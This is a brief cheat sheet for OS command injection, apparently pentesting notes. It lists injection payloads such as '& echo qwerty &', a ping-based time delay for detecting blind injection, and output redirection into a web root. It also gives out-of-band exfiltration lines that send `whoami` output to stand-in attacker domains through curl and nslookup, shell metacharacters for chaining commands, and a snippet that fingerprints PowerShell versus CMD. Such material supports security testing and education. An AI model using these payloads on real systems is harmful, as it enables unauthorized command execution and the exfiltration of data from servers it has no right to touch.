OS command injection
Command injection
& echo qwerty &
Placing & after the injected command is generally useful because it separates the injected command from whatever follows the injection point.
Blind OS command
Detection
# 10 sec. time delay
& ping -c 10 127.0.0.1 &
Exploit
- Redirecting output. Note: you must have write permission
& whoami > /var/www/static/whoami.txt &
curl https://website.com/whoami.txt
- Out-of-band techniques
& curl `whoami`.webserver-attacker.com & # HTTP traffic may be blocked
& nslookup `whoami`.kgji2ohoyw.web-attacker.com &
- Open a shell
Bypass restriction
There are so many ways: https://book.hacktricks.wiki/linux-hardening/bypass-bash-restrictions/index.html
Metacharacters
# Windows & Unix
&
&&
|
||
# Unix
;
# Unix inline execution
`command`
$(command)
Identify CMD or PowerShell
To determine whether commands are executed by PowerShell or CMD, use this snippet:
(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell